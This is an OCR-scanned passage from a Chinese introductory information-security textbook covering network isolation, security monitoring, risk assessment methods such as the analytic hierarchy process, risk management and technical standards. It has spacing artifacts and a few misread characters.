基于 网 络 协议 的 攻击 ， 即 不 能 够 让 网 络 层 的 攻击 包 到 达 要 保护 的 网 络 中 ， 所 以 就 必须 进 
行 协议 分 析 , 完成 应 用 层 数据 的 提取 , 然后 进行 数据 交换 , 这 样 就 把 诸如 TearDrop, Land, 
Smurf 和 SYN Flood 等 网 络 攻 击 包 ， 彻 底 地 阻挡 在 了 可 信 网 络 之 外 ， 从 而 明显 地 增强 了 
可 信和 网络 的 安全 性 。 

(4) 要 对 网 间 的 访问 进行 严格 的 控制 和 检查 。 作 为 一 套 适 用 于 高 安全 度 网 络 的 安全 
设备 ， 要 确保 每 次 数据 交换 都 是 可 信 的 和 可 控制 的 ， 严 格 防止 非法 通道 的 出 现 ， 以 确保 
信息 数据 的 安全 和 访问 的 可 审计 性 。 所 以 必须 施加 以 一 定 的 技术 ， 保 证 每 一 次 数据 交换 
过 程 都 是 可 信 的 ， 并 且 内 容 是 可 控制 的 ， 可 采用 基于 会 话 的 认证 技术 和 内 容 分 析 与 控制 
引擎 等 技术 来 实现 。 

(5) 要 在 坚持 隔离 的 前 提 下 保证 网 络 畅通 和 应 用 透明 。 隔 离 产品 会 部 署 在 多 种 多 样 
的 复杂 网 络 环境 中 , 并 且 往 往 是 数据 交换 的 关键 点 ， 因 此 , 产品 要 具有 很 高 的 处 理性 能 ， 
不 能 够 成 为 网 络 交换 的 瓶颈 ， 要 有 很 好 的 稳定 性 ; 不 能 够 出 现时 断 时 续 的 情况 ， 要 有 很 
强 的 适应 性 ， 能 够 透明 接 入 网 络 ， 并 且 透 明 支持 多 种 应 用 。 

网 络 隔离 的 关键 是 在 于 系统 对 通信 数据 的 控制 ， 即 通过 不 可 路 由 的 协议 来 完成 网 间 
的 数据 交换 。 由 于 通信 硬件 设备 工作 在 网 络 七 层 的 最 下 层 ， 并 不 能 感知 到 交换 数据 的 机 
密 性 、 完 整 性 、 可 用 性 、 可 控 性 、 抗 抵赖 等 安全 要 素 ， 所 以 这 要 通过 访问 控制 、 身 份 认 
证 、 加 密 签 名 等 安全 机 制 来 实现 ， 而 这 些 机 制 的 实现 都 是 通过 软件 来 实现 的 。 因 此 ， 隔 
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离 的 关键 点 就 成 了 要 尽量 提高 网 间 数 据 交换 的 速度 ， 并 且 对 应 用 能 够 透明 支持 ， 以 适应 
复杂 和 高 带宽 需求 的 网 间 数 据 交换 。 
1.3.2.4 ”安全 监控 

系统 安全 监控 是 指 对 系统 的 运行 状况 和 系统 中 的 用 户 的 行为 进行 监视 、 控 制 和 记 
录 。 通 过 系统 安全 监控 ， 安 全 管理 人 员 可 以 有 效 地 监视 、 控 制 和 评估 信息 系统 的 安全 运 
行 状况 ， 并 为 进一步 提高 系统 安全 性 提供 参考 和 依据 。 

安全 监控 通过 实时 监控 网 络 或 主机 活动 ， 监 视 分 析 用 户 和 系统 的 行为 ， 审 计 系 统 配 
置 和 漏洞 ,评估 敏感 系统 和 数据 的 完整 性 , 识别 攻击 行为 ,对 异常 行为 进行 统计 和 跟踪 ， 
识别 违反 安全 法 规 的 行为 ， 使 用 诱骗 服务 器 记录 黑客 行为 等 功能 ， 使 得 管理 员 能 够 更 有 
效 地 监视 、 控 制 和 评估 网 络 或 主机 系统 。 

安全 监控 可 以 分 为 网 络 安全 监控 和 主机 安全 监控 两 大 类 。 

1. 网 络 安全 监控 

网 络 安全 监控 主要 实现 以 下 几 种 功能 

(1) 全 面 的 网 络 安全 控制 : 除了 简单 的 访问 控制 意外 ， 还 应 该 有 入 侵 检测 等 功能 。 

(2) 细 粒 度 的 控制 : 除了 根据 数据 包头 为 依据 ， 还 应 该 对 应 用 层 协 议和 数据 包 内 容 
进行 过 滤 。 

G) 网 络 审 计 : 对 所 有 网 络 活动 进行 跟踪 ， 对 应 用 层 协 议 (如 HTTP, FTP, SMTP, 
POP3、TELNET 等 ) 会 话 过 程 进 行 实时 与 历史 的 重 现 。 

(4) 其 他 : 包括 日 志 、 报 警 、 报 告 和 拦截 等 功能 。 

2. 主机 安全 监控 

主机 安全 监控 主要 实现 以 下 几 种 功能 

(1) 访问 控制 : 加 强 用 户 访问 系统 资源 及 服务 时 的 安全 控制 ， 防 止 非法 用 户 的 入 侵 
及 合法 用 户 的 非法 访问 。 

(2) 系统 监控 实时 监控 系统 的 运行 状态 ， 包 括 运行 进程 、 系 统 设 备 、 系 统 资源 和 
网 络 服务 等 ， 判 断 在 线 用 户 的 行为 ， 禁 止 其 非法 操作 。 

(3) 系统 审计 : 对 用 户 的 行为 及 系统 事件 进行 记录 审计 。 

(4) 系统 漏洞 检查 : 检测 主机 系统 的 安全 漏洞 ， 防 止 因 主机 设置 不 当 带 来 的 安全 
隐患 。 
安全 监控 的 内 容 主要 包括 以 下 几 点 : 

(1) 主机 系统 监视 :通过 系统 状态 监视 可 以 实现 对 主机 当前 用 户 信息 、 系 统 信息 、 
设备 信息 、 系 统 进 程 、 系 统 服务 、 系 统 事件 、 系 统 窗 口 、 安 装 程序 以 及 实时 屏幕 等 信息 
的 监视 和 记录 。 

(2) 网 络 状态 监视 : 查看 受 控 主机 当前 活动 的 网 络 连接 、 开 放 的 系统 服务 以 及 端口 ， 
从 而 全 面 了 解 主机 的 网 络 状态 。 

(3) 用 户 操作 监视 : 对 用 户 的 系统 配置 和 操作 、 应 用 程序 操作 和 文件 操作 等 进行 监 
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视 和 记录 。 

(4) 主机 应 用 监控 : 对 主机 中 的 进程 、 服 务 和 应 用 程序 窗口 进行 控制 。 

(5) 主机 外 设 监视 : 对 受 控 主 机 的 USB 端口 、 串 行 端口 、 并 行 端口 等 外 设 接口 ， 以 
及 USB 盘 、 软 驱 、 光 驱 等 外 设 实施 存 取 控 制 。 

(6) 网 络 连接 监控 : 实现 对 非法 主机 接 入 的 隔离 和 对 合法 主机 网 络 行为 的 管控 。 一 
方面 对 非法 接 入 的 主机 进行 识别 、 报 警 和 隔离 ， 另 一 方面 实现 对 合法 主机 网 络 访问 行为 
的 监控 ， 包 括 网 络 地 址 端口 控制 、 网 络 URL 控制 、 邮 件 控制 、 拨 号 连接 控制 、 网 络 共 
享 控制 以 及 网 络 邻 居 控 制 等 。 


1.3.3 ”信息 安全 风险 评估 与 管理 


信息 系统 的 安全 风险 ， 是 指 由 于 系统 存在 的 脆弱 性 ， 人 为 或 自然 的 威胁 导致 安全 事 
件 发 生 的 可 能 性 及 其 造成 的 影响 。 

信息 安全 风险 评估 ， 则 是 指 依据 有 关 信 息 安全 技术 标准 ， 对 信息 系统 及 由 其 处 理 、 
传输 和 存储 的 信息 的 保密 性 、 完 整 性 和 可 用 性 等 安全 属性 进行 科学 评价 的 过 程 ， 它 要 评 
估 信 息 系统 的 脆弱 性 、 信 息 系 统 面临 的 威胁 以 及 脆弱 性 被 威胁 源 利用 后 所 产生 的 实际 负 
面 影 响 ， 并 根据 安全 事件 发 生 的 可 能 性 和 负面 影响 的 程度 来 识别 信息 系统 的 安全 风险 。 

信息 系统 风险 分 析 和 评估 是 一 个 复杂 的 过 程 ， 一 个 完善 的 信息 安全 风险 评估 架构 应 
该 具备 相应 的 标准 体系 、 技 术 体系 、 组 织 架 构 、 业 务 体 系 和 法 律 法 规 。 

任何 系统 的 安全 性 都 可 以 通过 风险 的 大 小 来 衡量 。 科 学 分 析 系统 的 安全 风险 ， 综 合 
平衡 风险 和 代价 的 过 程 就 是 风险 评估 。 风 险 评估 不 是 某 个 系统 (包括 信息 系统 ) 所 特有 
的 。 在 日 常生 活 和 工作 中 ,风险 评估 也 是 随处 可 见 ， 为 了 分 析 确 定 系统 风险 及 风险 大 小 ， 
进而 决定 采取 什么 措施 去 减少 、 避 免 风险 ， 把 残余 风险 控制 在 可 以 容忍 的 范围 内 。 人 们 
经 常会 提出 这 样 一 些 问题 : 什么 地 方 、 什 么 时 间 可 能 出 问题 ? 出 问题 的 可 能 性 有 多 大 ? 
这 些 问 题 的 后 果 是 什么 ? 应 该 采取 什么 样 的 措施 加 以 避免 和 弥补 ? 并 总 是 试图 找 出 最 合 
理 的 答案 。 这 一 过 程 实际 上 就 是 风险 评估 。 
1.3.3.1 风险 评估 

信息 系统 的 风险 评估 是 指 确定 在 计算 机 系统 和 网 络 中 每 一 种 资源 缺失 或 遭 到 破坏 
对 整个 系统 造成 的 预计 损失 数量 。 是 对 威胁 、 脆 弱点 以 及 由 此 带 来 的 风险 大 小 的 评估 。 

对 系统 进行 风险 分 析 和 评估 的 目的 就 是 : 了 解 系统 目前 与 未 来 的 风险 所 在 ， 评 估 这 
些 风险 可 能 带 来 的 安全 威胁 与 影响 程度 ， 为 安全 策略 的 确定 、 信 息 系统 的 建立 及 安全 运 
行 提 供 依 据 。 同 时 通过 第 三 方 权威 或 者 国际 机 构 评估 和 认证 ， 也 给 用 户 提供 了 信息 技术 
产品 和 系统 可 靠 性 的 信心 ， 增 强 产 品 、 单 位 的 竞争 力 。 

风险 评估 的 主要 任务 包括 : 

。 识别 组 织 面 临 的 各 种 风险 ; 

。 评估 风险 概率 和 可 能 带 来 的 负面 影响 ; 
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。 确定 组 织 承受 风险 的 能 

。 确定 风险 降低 和 控制 的 优先 等 级 ; 

。 推荐 风险 降低 政策 。 

风险 评估 过 程 就 是 在 评估 标准 的 指导 下 ， 综 合 利用 相关 评估 技术 、 评 估 方 法 、 评 估 
工具 ， 针 对 信息 系统 展开 全 方位 的 评估 工作 的 完整 历程 。 对 信息 系统 进行 风险 评估 ， 首 
先 应 确保 风险 分 析 的 内 容 与 范围 应 该 覆盖 信息 系统 的 整个 体系 ， 应 包括 : 系统 基本 情况 
分 析 、 信 息 系 统 基 本 安全 状况 调查 、 信 息 系统 安全 组 织 、 政 策 情况 分 析 、 信 息 系 统 弱 点 
漏洞 分 析 等 。 

风险 评估 有 具体 评估 过 程 如 下 : 

1. 确定 资产 

安全 评估 的 第 一 步 是 确定 信息 系统 的 资产 ， 并 明确 资产 的 价值 ， 资 产 的 价值 是 由 对 
组 织 、 供 应 商 、 合 作 伙伴 、 客 户 和 其 他 利益 相关 方 在 安全 事件 中 对 保密 性 、 完 整 性 和 可 
用 性 的 影响 来 衡量 的 。 资 产 的 范围 很 广 ， 一 切 需要 加 以 保护 的 东西 都 算 作 资产 ， 包 括 : 
信息 资产 、 纸 质 文件 、 软 件 资产 、 物 理 资产 、 人 员 、 公 司 形象 和 声誉 、 服 务 等 。 资 产 的 
评估 应 当 从 关键 业务 开始 ， 最 终 履 盖 所 有 的 关键 资产 。 

2. 脆弱 性 和 威胁 分 析 

对 资产 进行 细致 周密 的 分 析 ， 发 现 它 的 脆弱 点 及 由 脆弱 点 所 引发 的 威胁 ， 统 计 分 析 
发 生 概率 、 被 利用 后 所 造成 的 损失 等 。 

3. 制定 及 评估 控制 措施 

在 分 析 各 种 威胁 及 它们 发 生 可 能 性 基础 上 , 研究 消除 、 减轻 、 转移 威胁 风险 的 手段 。 
这 一 阶段 不 需要 做 出 什么 决策 ， 主 要 是 考虑 可 能 采取 的 各 种 安全 防范 措施 和 它们 的 实施 
成 本 。 

制定 出 的 控制 措施 应 当 全 面 ， 在 有 针对 性 的 同时 ， 要 考虑 系统 地 、 根 本 性 的 解决 方 
法 ， 为 下 一 阶段 的 决策 作 充 足 的 准备 ， 同 时 将 风险 和 措施 文档 化 。 

4. 决策 

这 一 阶段 包括 评估 影响 , 排列 风险 , 制定 决策 。 应 当 从 3 个 方面 来 考虑 最 终 的 决策 : 
接受 风险 、 避 免 风 险 、 转 移 风 险 。 对 安全 风险 决策 后 ， 明 确信 息 系统 所 要 接受 的 残余 风 
险 。 在 分 析 和 决策 过 程 中 ， 要 尽 可 能 多 地 让 更 多 的 人 参与 进来 ， 从 管理 层 的 代表 到 业务 
部 门 的 主管 ， 从 技术 人 员 到 非 技术 人 员 。 

5. 沟通 与 交流 

由 上 一 阶段 所 做 出 的 决策 ， 必 须 经 过 领导 层 的 签字 和 批准 ， 并 与 各 方面 就 决策 结论 
进行 沟通 。 这 是 很 重要 的 一 个 过 程 ， 沟 通 能 确保 所 有 人 员 对 风险 有 清醒 地 认识 ， 并 有 可 
能 在 发 现 一 些 以 前 没有 注意 到 的 脆弱 点 。 

6. 监督 实施 

最 后 的 步骤 是 安全 措施 的 实施 。 实 施 过 程 要 始终 在 监督 下 进行 ， 以 确保 决策 能 够 贯 


第 1 章 信息 安全 基础 


穿 于 工作 之 中 。 在 实施 的 同时 ， 要 密切 注意 和 分 析 新 的 威胁 并 对 控制 措施 进行 必要 的 
修改 。 

另外 ， 由 于 信息 系统 及 其 所 在 环境 的 不 断 变 化 ， 在 信息 系统 的 运行 过 程 中 ， 绝 对 安 
全 的 措施 是 不 存在 的 :攻击 者 不 断 有 新 的 方法 绕 过 或 扰乱 系统 中 的 安全 措施 ， 系 统 的 变 
化 会 带 来 新 的 脆弱 点 ， 实 施 的 安全 措施 会 随 着 时 间 而 过 时 等 等 ， 所 有 这 些 表 明 ， 信 息 系 
统 的 风险 评估 过 程 是 一 个 动态 循环 的 过 程 ， 应 周期 性 的 对 信息 系统 安全 进行 重 评估 。 

风险 评估 的 方法 有 很 多 种 ， 概 括 起 来 可 分 为 三 大 类 : 定量 的 风险 评估 方法 、 定 性 的 
风险 评估 方法 、 定 性 与 定量 相 结合 的 评估 方法 。 标 准 在 信息 系统 风险 评估 过 程 中 的 指导 
作用 不 容 忽 视 , 而 在 评估 过 程 中 使 用 何 种 方法 对 评估 的 有 效 性 同样 占有 举足轻重 的 地 位 。 
评估 方法 的 选择 直接 影响 到 评估 过 程 中 的 每 个 环节 ， 甚 至 可 以 左右 最 终 的 评估 结果 ， 所 
以 需要 根据 系统 的 具体 情况 ， 选 择 合适 的 风险 评估 方法 。 

1. 定量 评估 方法 

定量 的 评估 方法 是 指 运 用 数量 指标 来 对 风险 进行 评估 。 典 型 的 定量 分 析 方 法 有 因子 
分 析 法 、 聚 类 分 析 法 、 时 序 模型 、 回 归 模 型 、 等 风险 图 法 、 决 策 树 法 等 。 

定量 的 评估 方法 的 优点 是 用 直观 的 数据 来 表述 评估 的 结果 ， 看 起 来 一 目 了 然 ， 而 且 
比较 客观 ， 定 量 分 析 方 法 的 采用 ， 可 以 使 研究 结果 更 科学 ， 更 严密 ， 更 深刻 。 有 时 ， 一 
个 数据 所 能 够 说 明 的 问题 可 能 是 用 一 大 段 文 字 也 不 能 够 阐述 清楚 的 ;但 常常 为 了 量化 ， 
使 本 来 比较 复杂 的 事物 简单 化 、 模 糊 化 了 ， 有 的 风险 因素 被 量化 以 后 还 可 能 被 误解 和 
曲解 。 

2， 定 性 评估 方法 

定性 的 评估 方法 主要 依据 研究 者 的 知识 、 经 验 、 历 史 教 训 、 政 策 走向 及 特殊 变 例 等 
非 量 化 资料 对 系统 风险 状况 做 出 判断 的 过 程 。 它 主要 以 与 调查 对 象 的 深入 访谈 做 出 个 案 
记录 为 基本 资料 ， 然 后 通过 一 个 理论 推导 演绎 的 分 析 框 架 ， 对 资料 进行 编码 整理 ， 在 此 
基础 上 做 出 调查 结论 。 典 型 的 定性 分 析 方 法 有 因素 分 析 法 、 风 辑 分 析 法 、 历 史 比 较 法 、 
德尔 斐 法 。 

定性 评估 方法 的 优点 是 避免 了 定量 方法 的 缺点 ， 可 以 挖掘 出 一 些 列 藏 很 深 的 思想 ， 
使 评估 的 结论 更 全 面 、 更 深刻 ; 但 它 的 主观 性 很 强 ， 对 评估 者 本 身 的 要 求 很 高 。 

3， 定 性 与 定量 相 结 合 的 综合 评估 方法 

系统 风险 评估 是 一 个 复杂 的 过 程 ， 需 要 考虑 的 因素 很 多 ， 有 些 评估 要 素 是 可 以 用 量 
化 的 形式 来 表达 ， 而 对 有 些 要 素 的 量化 又 是 很 困难 甚至 是 不 可 能 的 ， 所 以 不 主张 在 风险 
评估 过 程 中 一 味 地 追求 量化 ， 也 不 认为 一 切 都 是 量化 的 风险 评估 过 程 是 科学 、 准 确 的 。 

定量 分 析 是 定性 分 析 的 基础 和 前 提 ， 定 性 分 析 应 建立 在 定量 分 析 的 基础 上 才能 揭示 
客观 事物 的 内 在 规律 。 定 性 分 析 则 是 灵魂 ， 是 形成 概念 、 观 点 ， 做 出 判断 ， 得 出 结论 所 
必须 依靠 的 ， 在 复杂 的 信息 系统 风险 评估 过 程 中 ， 不 能 将 定性 分 析 和 定量 分 析 两 种 方法 
简单 的 割裂 开 来 。 而 是 应 该 将 这 两 种 方法 融合 起 来 ， 采 用 综合 的 评估 方法 。 
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4. 典型 的 风险 评估 方法 

在 信息 系统 风险 评估 过 程 中 ， 层 次 分 析 法 经 常 被 用 到 ， 它 是 一 种 综合 的 评估 方法 。 
该 方法 是 由 美国 著名 的 运筹 学 专家 萨 带 TL 于 20 世纪 70 年 代 提 出 来 的 ， 是 一 种 定性 与 
定量 相 结合 的 多 目标 决策 分 析 方 法 。 这 一 方法 的 核心 是 将 决策 者 的 经 验 判 断 给 予 量 化 ， 
从 而 为 决策 者 提供 定量 形式 的 决策 依据 。 目 前 该 方法 已 被 广泛 地 应 用 于 尚 无 统一 度量 标 
尺 的 复杂 问题 的 分 析 ， 解 决 用 纯 参 数 数学 模型 方法 难以 解决 的 决策 分 析 问 题 。 该 方法 对 
系统 进行 分 层次 、 拟 定量 、 规 范 化 处 理 ， 在 评估 过 程 中 经 历 系统 分 解 、 安 全 性 判断 和 综 
合 判断 三 个 阶段 。 它 的 基本 步骤 是 : 

(1) 系统 分 解 ， 建 立 层次 结构 模型 : 层次 模型 的 构造 是 基于 分 解法 的 思想 ， 进 行 对 
象 的 系统 分 解 。 它 的 基本 层次 有 三 类 : 目标 层 、 准 则 层 和 指标 层 ， 目 的 是 基于 系统 基本 
特征 建立 系统 的 评估 指标 体系 。 

(2) 构造 判断 矩阵 ， 通 过 单 层 次 计算 进行 安全 性 判断 : 判断 矩阵 的 作用 是 在 上 一 层 
某 一 元 素 约束 条 件 下 ， 对 同 层次 的 元 素 之 间 相 对 重要 性 进行 比较 ， 根 据 心理 学 家 提出 的 
“人 区 分 信息 等 级 的 极限 能 力 为 7 土 2” 的 研究 结论 ， 层 次 分 析 方 法 在 对 评估 指标 的 相对 
重要 程度 进行 测量 时 ， 引 入 了 九 分 位 的 相对 重要 的 比例 标 度 ， 构 成 判断 和 矩阵。 计算 的 中 
心 问 题 是 求解 判断 矩阵 的 最 大 特征 根 及 其 对 应 的 特征 向 量 ， 通 过 判断 矩阵 及 矩阵 运算 的 
数学 方法 , 确定 对 于 上 一 层次 的 某 个 元 素 而 言 , 本 层次 中 与 其 相关 元 素 的 相对 风险 权 值 。 

G) 层次 总 排序 ， 完 成 综合 判断 :计算 各 层 元 素 对 系统 目标 的 合成 权重 ， 完 成 综合 
判断 ， 进 行 总 排序 ， 以 确定 递 阶 结构 图 中 最 底层 各 个 元 素 在 总 目标 中 的 风险 程度 。 
13.3.2 ”风险 管理 

如 今 ， 风 险 管理 已 经 是 信息 安全 保障 工作 的 一 个 主流 范式 。 信 息 安全 防范 工作 越 来 
越 基 于 风险 管理 。 互 联网 的 飞速 发 展 使 得 公众 网 络 的 应 用 越 来 越 广泛 ， 在 公众 网 络 中 间 
构建 相对 可 信 的 网 络 ， 成 为 世界 各 国 发 展 信息 化 的 主要 需求 。 如 何 有 效 地 管理 信息 安全 
风险 ， 自 然 成 为 各 方面 都 十 分 关注 的 问题 。 

所 谓 风险 管理 就 是 以 可 以 接受 的 费用 识别 、 控 制 、 降 低 或 消除 可 能 影响 信息 系统 的 
安全 风险 的 过 程 。 风 险 管理 通过 风险 评估 来 识别 风险 大 小 ， 通 过 制定 信息 安全 方针 、 采 
取 适 当 的 控制 目标 与 控制 方式 对 风险 进行 控制 ， 使 风险 被 避免 、 转 移 或 降 至 一 个 可 以 被 
接受 的 水 平 。 风 险 管 理 还 应 考虑 控制 费用 与 风险 之 间 的 平衡 。 

风险 管理 是 当今 全 球 信息 安全 工作 的 一 个 热点 。 风 险 管理 的 核心 内 容 目 前 在 国际 上 
基本 包括 以 下 四 个 方面 : 一 是 确立 风险 意识 的 文化 ， 二 要 对 风险 进行 现实 的 评估 ; 三 是 
要 确立 风险 承担 制 ， 四 是 将 风险 管理 纳入 信息 化 建设 的 日 常 工作 中 。 

安全 政策 的 制定 和 实施 是 为 了 将 安全 风险 减 小 到 可 以 令 人 接受 的 限度 。 但 由 于 风险 
具有 不 确定 性 ， 因 此 要 完全 消除 风险 是 不 切实 际 的 。 对 信息 安全 管理 的 设计 和 维护 人 员 
来 说 , 要 根据 信息 风险 的 一 般 规律 提出 安全 需求 , 建立 具有 自 适应 能 力 的 信息 安全 模型 ， 
从 而 将 风险 减 小 到 可 以 接受 的 限度 。 一 个 信息 系统 是 否 安全 要 看 它 的 风险 是 否 在 可 控 范 
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围 内 ， 而 不 是 绝对 的 无 风险 。 
通过 风险 评估 对 风险 进行 识别 和 评价 后 ， 风 险 管理 的 下 一 步 工 作 就 是 对 风险 实施 安 
全 控制 ， 以 确保 风险 被 降低 或 消除 。 


CL) 当 存 在 系统 脆弱 性 (缺陷 或 弱点 ) 时 ， 降 低 或 修补 系统 脆弱 性 ， 减 少 脆弱 性 被 
攻击 的 可 能 性 。 

(2) 当 系 统 脆弱 性 可 被 恶意 攻击 时 ， 运 用 层次 化 保护 、 结 构 化 设计 、 管 理 控制 等 方 
法 将 风险 最 小 化 或 防止 脆弱 性 被 利用 。 

G) 当 攻 击 者 的 成 本 小 于 攻击 的 可 能 所 得 时 ， 运 用 保护 措施 ， 通 过 提高 攻击 者 成 本 
来 降低 攻击 者 的 攻击 动机 (例如 使 用 系统 化 的 控制 , 如 限制 系统 用 户 的 访问 对 象 和 行为 ， 
这 些 措施 能 够 大 大 降低 攻击 所 得 )。 

(4) 当 损 失 巨 大 时 ， 运 用 系统 设计 中 的 基本 原则 及 结构 化 设计 、 技 术 或 非 技术 类 保 
护 措施 来 限制 攻击 的 范围 ， 从 而 降低 可 能 的 损失 。 

当选 择 安全 控制 措施 进行 实施 时 应 当 考虑 以 下 因素 : 

。 控制 的 易 用 性 ; 

。 用 户 透 明度 ; 

。 为 用 户 提供 帮助 ， 以 发 挥 控制 的 功能 ; 

。 控制 的 相对 强度 ; 

。 实现 的 功能 类 型 。 

通常 ， 一 个 控制 可 以 实现 多 个 功能 ， 实 现 的 越 多 越 好 。 当 考虑 总 体 安全 性 或 应 用 一 
系列 控制 的 时 候 ， 应 尽 可 能 保持 各 种 功能 之 问 的 平衡 ， 这 有 助 于 使 得 总 体 安 全 获得 较 好 
的 效果 与 较 高 的 效率 。 

组 织 根据 控制 的 原则 识别 并 选择 了 安全 控制 措施 后 ， 对 选择 的 安全 控制 应 严格 实施 
并 保持 。 一 般 可 通过 以 下 途径 达到 降低 风险 的 目的 : 

(1) 避免 风险 : 例如 通过 将 重要 的 计算 机 进行 网 络 隔离 ， 使 之 免 受 外 部 网 络 的 攻击 。 

(2) 转移 风险 : 例如 通过 将 高 风险 的 信息 处 理 业务 外 包 给 第 三 方 或 通过 购买 一 定 的 
商业 保险 进行 风险 转移 。 

(3) 减少 威胁 : 例如 建立 并 实施 恶意 软件 控制 程序 ， 减 少 信息 系统 受 恶 意 软件 攻击 
的 机 会 。 

(4) 减少 脆弱 性 :例如 经 常 为 系统 安装 补丁 ， 修 补 系统 漏洞 ， 以 防止 系统 脆弱 性 被 
利用 。 

(5) 减少 威胁 可 能 的 影响 : 例如 建立 业务 持续 性 计划 , 把 灾难 造成 的 损失 降 到 最 低 。 

(6) 检测 意外 事件 ， 并 做 出 响应 和 恢复 : 例如 使 用 网 络 管理 系统 对 网 络 性 能 与 故障 
进行 监测 ， 及 时 发 现 问题 并 做 出 反应 。 

在 实施 选择 的 安全 控制 后 ， 仍 然 会 存在 风险 ， 称 之 为 残留 风险 或 剩余 风险 。 为 确保 
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组 织 信息 系统 的 安全 ， 剩 余 风险 应 当 在 可 接受 的 范围 之 内 。 

风险 接受 是 一 个 对 残留 风险 进行 确认 和 评价 的 过 程 。 在 安全 控制 实施 之 后 ， 组 织 应 
对 所 选择 的 安全 控制 的 实施 情况 进行 评审 ， 即 对 所 选择 的 控制 在 多 大 程度 上 降低 了 风险 
做 出 判断 , 也 就 是 对 实施 安全 控制 后 的 资产 风险 进行 重新 计算 , 以 获得 残留 风险 的 大 小 ， 
并 将 之 分 为 可 接受 和 不 可 接受 的 风险 。 对 于 每 一 个 不 可 接受 的 风险 ， 必 须 做 出 相应 的 业 
务 决策 以 判断 该 风险 可 能 的 后 果 ， 或 是 增加 控制 费用 以 将 该 风险 控制 到 一 个 可 以 接受 的 
KFs 

组 织 在 完成 了 包括 风险 评估 ， 降 低 风 险 和 风险 接受 的 风险 管理 过 程 之 后 ， 可 以 将 风 
险 控制 在 一 个 可 以 接受 的 水 平 ， 但 并 不 意味 着 风险 管理 工作 的 结束 。 事 实 上 ， 信 息 系统 
总 是 随 着 时 间 的 推移 而 不 断 地 更 新 和 变化 的 ， 这 样 ， 风 险 就 是 随 着 时 间 而 变化 的 ， 风 险 
管理 也 就 应 该 是 一 个 动态 的 、 持 续 的 管理 过 程 。 这 就 要 求 组 织 实施 动态 的 风险 评估 与 风 
险 管 理 ， 在 组 织 有 新 增 信息 资产 时 、 系 统 发 生 重大 变化 时 、 发 生 严重 的 信息 安全 事故 时 
以 及 任何 被 认为 有 必要 的 时 候 ， 都 应 该 组 织 进行 风险 评估 ， 以 便 及 时 识别 风险 并 进行 有 
效 的 控制 。 
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1.4.1 技术 标准 的 基本 知识 


标准 是 人 们 为 某 种 目的 和 需要 而 提出 的 统一 性 要 求 ， 是 对 一 定 范围 内 的 重复 性 事务 
和 概念 所 做 的 统一 规定 。 标 准 又 是 一 种 特殊 的 文件 ， 它 是 为 在 一 定 的 范围 内 获得 最 佳 秩 
序 ， 对 活动 及 其 结果 规定 共同 重复 使 用 的 规则 、 指 导 原 则 或 特性 要 求 。 

标准 对 促进 信息 通信 技术 产业 发 展 及 推广 应 用 发 挥 着 极其 重要 的 作用 。 统 一 标准 是 
互联 互通 、 信 息 共享 、 业 务 协同 的 基础 。 如 果 没有 标准 ， 互 联网 不 会 发 展 到 今天 这 种 规 
模 。 人 们 很 难说 清楚 生产 一 台电 脑 需要 遵循 多 少 标准 ， 但 是 每 个 生产 商 一 定 会 考虑 采用 
标准 统一 的 磁盘 驱动 器 、 打 印 机 接口 和 网 卡 等 。 

标准 化 则 是 制定 标准 并 使 其 在 社会 一 定 范围 内 得 以 推广 应 用 的 一 系列 活动 。 这 些 活 
动 主 要 包括 制定 、 发 布 、 实 施 及 修改 标准 等 过 程 。 信 息 化 建设 相关 的 标准 化 工作 是 推动 
国家 信息 化 建设 的 重要 基础 性 工作 。 在 国家 信息 化 建设 过 程 中 ， 标 准 是 规范 技术 开发 、 
产品 生产 、 工 程 管 理 等 行为 的 技术 法 规 。 统 一 标准 是 信息 系统 互通 、 互 连 、 互 操作 的 前 
提 。 只 有 通过 统一 技术 要 求 、 业 务 要 求 和 管理 要 求 等 标准 化 手段 ， 才 可 以 保障 信息 化 建 
设 的 相关 工程 及 相关 环节 的 建设 在 全 国 范围 内 有 章 可 循 ， 有 法 可 依 ， 形 成 一 个 有 机 的 整 
体 ， 避 免 言 目 和 重复 ， 降 低 成 本 ， 提 高 效益 ， 从 而 规范 和 促进 国家 信息 化 建设 有 序 、 高 
效 、 快 速 和 健康 地 发 展 。 

标准 产生 的 基础 是 “科学 、 技 术 和 经 验 的 综合 成 果 ”， 这 黄 定 了 标准 的 科学 性 和 先 
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进 性 。 标 准 的 产生 要 经 过 协商 一 致 制定 并 由 公认 机 构 批准 。 协 商 一 致 是 指 : 普遍 同意 ， 
表征 为 对 实质 性 问题 ， 有 关 重 要 方面 没有 坚持 反对 意见 ， 并 且 按 程序 对 有 关 各 方面 的 观 
点 进行 了 研究 和 对 争议 经 过 了 协调 。 协 商 一 臻 并 不 意味 着 没有 异议 。 简 言 之 ， 协 商 一 臻 
是 指 有 关 各 界 的 重要 一 方 对 标准 中 的 实质 性 问题 普遍 接受 ， 没 有 坚持 反对 意见 ， 但 并 不 
是 说 所 有 各 方 全 无 异议 。 为 了 保证 标准 的 严肃 性 和 权威 性 ， 标 准 需 经 公认 机 构 批准 这 是 
非常 必要 的 。 这 里 指 公 认 机 构 ， 自 然 是 权威 机 构 ， 它 一 般 包 括 政府 主管 部 门 、 标 准 化 组 
织 或 团体 (包括 国际 组 织 或 区 域 组 织 )， 从 事 标准 化 工作 的 协会 或 学 会 等 等 。 

在 我 国 , 将 标准 级 别 依据 《中 华人 民 共 和 国标 准 化 法 》 划 分 为 国家 标准 、 行 业 标 准 、 
地 方 标准 和 企业 标准 等 4 个 层次 。 各 层次 之 间 有 一 定 的 依从 关系 和 内 在 联系 ， 形 成 一 个 
窗 盖 全 国 又 层次 分 明 的 标准 体系 。 此 外 ， 为 适应 某 些 领域 标准 快速 发 展 和 快速 变化 的 需 
要 ， 于 1998 年 规定 的 四 级 标准 之 外 ， 增 加 一 种 “国家 标准 化 指导 性 技术 文件 ”， 作 为 对 
国家 标准 的 补充 ， 其 代号 为 “GB/Z”。 符 合 下 列 情况 之 一 的 项 目 ， 可 以 制定 指导 性 技术 
文件 : 技术 尚 在 发 展 中 , 需要 有 相应 的 文件 引导 其 发 展 或 具有 标准 化 价值 ， 尚 不 能 制 
定 为 标准 的 项 目 ; @ 采用 国际 标准 化 组 织 、 国 际 电工 委员 会 及 其 他 国际 组 织 (包括 区 域 
性 国际 组 织 ) 的 技术 报告 的 项 目 。 指 导 性 技术 文件 仅 供 使 用 者 参考 。 

依据 《中 华人 民 共 和 国标 准 化 法 》 的 规定 ， 国 家 标准 、 行 业 标准 均 可 分 为 强制 性 和 
